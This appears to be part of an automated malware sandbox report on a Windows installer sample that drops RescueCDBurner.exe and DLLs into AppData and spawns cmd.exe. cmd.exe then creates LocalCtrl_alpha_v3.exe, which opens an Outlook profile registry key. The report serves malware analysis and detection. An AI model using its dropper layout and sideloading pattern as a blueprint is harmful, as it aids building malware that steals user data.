Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: pla.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: starburn.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: qtcore4.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: qtgui4.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: qtnetwork4.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: qtxml4.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcp100.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: pla.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32Jump to behavior
Source: bfxggb.5.drLNK file: ..\..\..\..\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
Source: kXzODlqJak.exeStatic file information: File size 14323584 > 1048576
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exeFile opened: C:\Windows\TEMP\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\msvcr100.dllJump to behavior
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: kXzODlqJak.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: kXzODlqJak.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0@ source: RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: msvcr100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000003.00000002.1513682078.000000006C621000.00000020.00000001.01000000.0000000E.sdmp, RescueCDBurner.exe, 00000004.00000002.1575451197.000000006D4E1000.00000020.00000001.01000000.00000017.sdmp, RescueCDBurner.exe, 00000008.00000002.1845851673.000000006D6B1000.00000020.00000001.01000000.00000017.sdmp
Source: Binary string: msvcp100.i386.pdb source: RescueCDBurner.exe, 00000003.00000002.1513883518.000000006C6E1000.00000020.00000001.01000000.0000000D.sdmp, RescueCDBurner.exe, 00000004.00000002.1575775399.000000006D5A1000.00000020.00000001.01000000.00000016.sdmp
Source: Binary string: D:\a\wix4\wix4\build\burn\Release\x86\burn.pdb source: kXzODlqJak.exe, 00000001.00000000.1458362168.000000000097E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000002.00000000.1464490420.00000000001CE000.00000002.00000001.01000000.00000005.sdmp, kXzODlqJak.exe, 00000002.00000002.1484896515.00000000001CE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: R:\Codes\TXFTNActiveX\TXFTNActiveX\ReleaseUMinDependency\TXFTNActiveX.pdb 0Jm source: kXzODlqJak.exe, 00000002.00000002.1486043148.000000006D491000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: wntdll.pdbUGP source: RescueCDBurner.exe, 00000003.00000002.1513161996.0000000009BFD000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1513361909.0000000009F50000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1572080726.000000000A9F0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1567761052.000000000342E000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1572388231.000000000ADAB000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1878041034.0000000004F60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877347727.0000000004697000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1843959169.0000000009DBF000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1844261418.000000000A4C1000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RescueCDBurner.exe, 00000003.00000002.1513161996.0000000009BFD000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1513361909.0000000009F50000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1572080726.000000000A9F0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1567761052.000000000342E000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1572388231.000000000ADAB000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1878041034.0000000004F60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877347727.0000000004697000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1843959169.0000000009DBF000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1844261418.000000000A4C1000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\wix4\wix4\build\burn\Release\x86\burn.pdb> source: kXzODlqJak.exe, 00000001.00000000.1458362168.000000000097E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000002.00000000.1464490420.00000000001CE000.00000002.00000001.01000000.00000005.sdmp, kXzODlqJak.exe, 00000002.00000002.1484896515.00000000001CE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\Codes\TXFTNActiveX\TXFTNActiveX\ReleaseUMinDependency\TXFTNActiveX.pdb source: kXzODlqJak.exe, 00000002.00000002.1486043148.000000006D491000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: RescueCDBurner.exe, 00000003.00000002.1516266410.000000006D381000.00000020.00000001.01000000.00000008.sdmp, RescueCDBurner.exe, 00000004.00000002.1576546170.000000006D7F1000.00000020.00000001.01000000.00000011.sdmp, RescueCDBurner.exe, 00000008.00000002.1846420137.00000000700A1000.00000020.00000001.01000000.00000011.sdmp
Source: kXzODlqJak.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: kXzODlqJak.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: kXzODlqJak.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: kXzODlqJak.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: kXzODlqJak.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D48530E LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer | 2_2_6D48530E
Source: QtCore4.dll.2.dr | Static PE information: real checksum: 0x283beb should be: 0x284aa4
Source: oeqwwe.5.dr | Static PE information: real checksum: 0x26dceb should be: 0x26a793
Source: Ascidian.dll.2.dr | Static PE information: real checksum: 0x77117 should be: 0x7ccd7
Source: QtCore4.dll.3.dr | Static PE information: real checksum: 0x283beb should be: 0x284aa4
Source: qpfwaekftwavc.9.dr | Static PE information: real checksum: 0x26dceb should be: 0x26a793
Source: StarBurn.dll.2.dr | Static PE information: real checksum: 0xa4afa should be: 0xab76c
Source: StarBurn.dll.3.dr | Static PE information: real checksum: 0xa4afa should be: 0xab76c
Source: kXzODlqJak.exe | Static PE information: section name: .didat
Source: kXzODlqJak.exe | Static PE information: section name: .wixburn
Source: kXzODlqJak.exe.1.dr | Static PE information: section name: .didat
Source: kXzODlqJak.exe.1.dr | Static PE information: section name: .wixburn
Source: LocalCtrl_alpha_v3.exe.5.dr | Static PE information: section name: Shared
Source: oeqwwe.5.dr | Static PE information: section name: .xdata
Source: oeqwwe.5.dr | Static PE information: section name: sfdel
Source: qpfwaekftwavc.9.dr | Static PE information: section name: .xdata
Source: qpfwaekftwavc.9.dr | Static PE information: section name: sfdel
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_009AE000 push ss; ret | 1_2_009AE01D
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_009AE02E push ss; ret | 1_2_009AE01D
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 1_2_0097CAD3 push ecx; ret | 1_2_0097CAE6
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001FE000 push ss; ret | 2_2_001FE01D
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001FE07E push esi; retn 001Ch | 2_2_001FE081
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001FE076 push es; ret | 2_2_001FE07D
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_001CCAD3 push ecx; ret | 2_2_001CCAE6
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D444910 push ebp; retf | 2_2_6D44491B
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D478405 push ecx; ret | 2_2_6D478418
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D4747B4 push ecx; ret | 2_2_6D4747C7
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C630CC5 push ecx; ret | 3_2_6C630CD8
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C622D88 push eax; ret | 3_2_6C622DA6
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | Code function: 3_2_6C63B658 push ecx; ret | 3_2_6C63B66B
Source: msvcr100.dll.2.dr | Static PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.2.dr | Static PE information: section name: .text entropy: 6.9340411158815725
Source: msvcr100.dll.3.dr | Static PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.3.dr | Static PE information: section name: .text entropy: 6.9340411158815725
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | File created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtXml4.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | File created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcp100.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | File created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\StarBurn.dll
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | File created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtNetwork4.dll
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | File created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtCore4.dll
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\qpfwaekftwavc
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | File created: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\msvcp100.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | File created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtCore4.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | File created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcr100.dll
Source: C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe | File created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtXml4.dll
